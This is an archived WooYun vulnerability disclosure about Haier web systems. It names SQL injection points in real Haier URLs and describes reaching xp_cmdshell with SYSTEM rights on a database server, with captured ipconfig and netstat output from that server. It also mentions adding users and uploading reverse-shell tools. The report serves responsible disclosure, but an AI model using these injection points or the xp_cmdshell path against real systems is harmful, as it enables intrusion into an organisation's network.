乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
数据库服务器
http://gopurchase.haier.com/GOPurchase/Common/ConsultSupplyerBank.aspx?cId=inbankNo&cNm=inbankNm&strWhere=&selectType=0&selectIds=a" -p "strWhere"strWhere参数站库分离16H数据库服务器~~~默认自带 xp_cmdshell这玩意
system权限,可添加用户,上传反弹工具进行内网渗透
command standard output:---Windows IP ConfigurationEthernet adapter 本地连接 5: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.135.106.44 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.135.106.1Ethernet adapter 本地连接 2: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 172.11.178.100 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :---
Proto Local Address Foreign Address State PID TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1808 TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:110 0.0.0.0:0 LISTENING 3040 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 752 TCP 0.0.0.0:383 0.0.0.0:0 LISTENING 4292 TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2916 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 480 TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING 1560 TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1560 TCP 0.0.0.0:1035 0.0.0.0:0 LISTENING 1560 TCP 0.0.0.0:1038 0.0.0.0:0 LISTENING 1808 TCP 0.0.0.0:1078 0.0.0.0:0 LISTENING 2988 TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 2184 TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING 2956 TCP 0.0.0.0:2030 0.0.0.0:0 LISTENING 2496 TCP 0.0.0.0:2100 0.0.0.0:0 LISTENING 2956 TCP 0.0.0.0:2301 0.0.0.0:0 LISTENING 4032 TCP 0.0.0.0:2381 0.0.0.0:0 LISTENING 4032 TCP 0.0.0.0:2383 0.0.0.0:0 LISTENING 2292 TCP 0.0.0.0:3339 0.0.0.0:0 LISTENING 2916 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 4356 TCP 0.0.0.0:5053 0.0.0.0:0 LISTENING 1628 TCP 0.0.0.0:5555 0.0.0.0:0 LISTENING 2464 TCP 0.0.0.0:7778 0.0.0.0:0 LISTENING 2916 TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 2956 TCP 0.0.0.0:8228 0.0.0.0:0 LISTENING 224 TCP 0.0.0.0:8400 0.0.0.0:0 LISTENING 1560 TCP 0.0.0.0:8402 0.0.0.0:0 LISTENING 3804 TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 3680 TCP 0.0.0.0:17560 0.0.0.0:0 LISTENING 660 TCP 10.135.106.44:139 0.0.0.0:0 LISTENING 4 TCP 10.135.106.44:1063 10.135.106.44:8402 ESTABLISHED 1560 TCP 10.135.106.44:1080 10.135.106.44:1521 ESTABLISHED 2988 TCP 10.135.106.44:1081 10.135.106.44:1748 ESTABLISHED 2800 TCP 10.135.106.44:1091 10.135.106.44:1433 ESTABLISHED 6448 TCP 10.135.106.44:1433 10.135.7.221:38602 ESTABLISHED 2184 TCP 10.135.106.44:1433 10.135.106.44:1091 ESTABLISHED 2184 TCP 10.135.106.44:1433 192.168.50.2:2137 ESTABLISHED 2184 TCP 10.135.106.44:1433 192.168.50.2:2619 ESTABLISHED 2184 TCP 10.135.106.44:1521 10.135.106.44:1080 ESTABLISHED 2956 TCP 10.135.106.44:1748 0.0.0.0:0 LISTENING 2964 TCP 10.135.106.44:1748 10.135.106.44:1081 ESTABLISHED 2964 TCP 10.135.106.44:1754 0.0.0.0:0 LISTENING 2964 TCP 10.135.106.44:1808 0.0.0.0:0 LISTENING 2964 TCP 10.135.106.44:1809 0.0.0.0:0 LISTENING 2964 TCP 10.135.106.44:8402 10.135.106.44:1063 ESTABLISHED 3804 TCP 10.135.106.44:10050 10.138.106.101:54861 TIME_WAIT 0 TCP 10.135.106.44:10050 10.138.106.101:57608 TIME_WAIT 0 TCP 10.135.106.44:10050 10.138.106.101:58195 TIME_WAIT 0 TCP 10.135.106.44:10050 10.138.106.101:60777 TIME_WAIT 0 TCP 10.135.106.44:16389 0.0.0.0:0 LISTENING 2184 TCP 127.0.0.1:1036 127.0.0.1:1037 ESTABLISHED 1560 TCP 127.0.0.1:1037 127.0.0.1:1036 ESTABLISHED 1560 TCP 127.0.0.1:1068 0.0.0.0:0 LISTENING 3964 TCP 127.0.0.1:1068 127.0.0.1:3912 ESTABLISHED 3964 TCP 127.0.0.1:1071 0.0.0.0:0 LISTENING 1004 TCP 127.0.0.1:1071 127.0.0.1:1536 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1538 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1540 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1542 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1545 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1547 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1549 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1552 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1554 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1556 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1559 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1561 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1563 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1565 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1568 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1570 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1572 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1575 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1577 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1580 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1583 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1585 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1587 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1589 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1592 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1594 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1596 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1599 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1601 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1603 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1606 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1608 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1610 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1612 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1616 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1618 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1620 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1623 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1625 TIME_WAIT 0 TCP 127.0.0.1:1071 127.0.0.1:1627 TIME_WAIT 0 TCP 127.0.0.1:1075 0.0.0.0:0 LISTENING 3964 TCP 127.0.0.1:1077 0.0.0.0:0 LISTENING 996 TCP 127.0.0.1:1077 127.0.0.1:1535 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1537 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1539 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1541 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1544 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1546 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1548 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1551 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1553 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1555 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1558 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1560 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1562 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1564 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1567 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1569 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1571 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1574 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1576 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1579 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1582 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1584 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1586 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1588 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1591 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1593 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1595 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1598 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1600 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1602 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1605 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1607 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1609 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1611 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1615 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1617 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1619 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1622 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1624 TIME_WAIT 0 TCP 127.0.0.1:1077 127.0.0.1:1626 TIME_WAIT 0 TCP 127.0.0.1:1082 0.0.0.0:0 LISTENING 6284 TCP 127.0.0.1:1114 0.0.0.0:0 LISTENING 6528 TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 2184 TCP 127.0.0.1:1492 0.0.0.0:0 LISTENING 7196 TCP 127.0.0.1:1496 0.0.0.0:0 LISTENING 6708 TCP 127.0.0.1:1496 127.0.0.1:4026 ESTABLISHED 6708 TCP 127.0.0.1:3912 127.0.0.1:1068 ESTABLISHED 4292 TCP 127.0.0.1:4026 127.0.0.1:1496 ESTABLISHED 4292 TCP 127.0.0.1:42424 0.0.0.0:0 LISTENING 1396 TCP 172.11.178.100:139 0.0.0.0:0 LISTENING 4 TCP 172.11.178.100:16389 0.0.0.0:0 LISTENING 2184 UDP 0.0.0.0:161 *:* 3432 UDP 0.0.0.0:445 *:* 4 UDP 0.0.0.0:500 *:* 480 UDP 0.0.0.0:1058 *:* 3432 UDP 0.0.0.0:1434 *:* 3468 UDP 0.0.0.0:3456 *:* 1808 UDP 0.0.0.0:4500 *:* 480 UDP 10.135.106.44:123 *:* 860 UDP 10.135.106.44:137 *:* 4 UDP 10.135.106.44:138 *:* 4 UDP 127.0.0.1:123 *:* 860 UDP 127.0.0.1:3456 *:* 1808 UDP 172.11.178.100:123 *:* 860
想干嘛干嘛~!
如上另外再送个sql注入http://idea.haier.com//mas/front/live/mao?method=list&search=1001&sField=1&sOpr=like&sWord=1sField 参数
运维童鞋加把劲~
危害等级:高
漏洞Rank:11
确认时间:2015-10-26 17:56
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无
